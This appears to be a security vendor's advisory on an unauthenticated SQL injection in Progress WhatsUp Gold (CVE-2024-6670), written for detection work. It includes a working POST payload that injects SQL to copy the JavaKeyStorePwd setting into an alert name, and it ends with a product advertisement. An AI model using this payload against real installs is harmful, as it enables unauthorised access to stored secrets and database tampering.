top of page

Progress Software WhatsUp Gold SQL Injection (CVE-2024-6670)



Application Details

Progress Software WhatsUp Gold is a network monitoring tool, used for complete visability of network devices, servers, virtual machines, cloud, and wireless environments.


Vulnerability

Progress Software WhatsUp Gold is vulnerable to SQL injection which could result in remote attackers bypassing authentication on affected Progress Software WhatsUp Gold installs. When exploiting this vulnerability, authentication is not necessary.


Identification

After sending specially crafted SQL statements, a remote attacker could successfully view, add, modify or delete information in the back-end database. This is due to a specific flaw within the implementation of HasErrors method, which lacks proper "user-supplied" validation. A remote attacker can leverage this vulnerability to bypass authentication on the system.


POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors
PAYLOAD - {"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}


Detection

By turning this into a traffic file and matching rule, we are able to detect attempts by an unauthenticated attacker to retrieve the user's encrypted password.


Coverage

Idappcom has created signature 8025262 along with a traffic file.


References


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability, or others, why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

Komentarai


bottom of page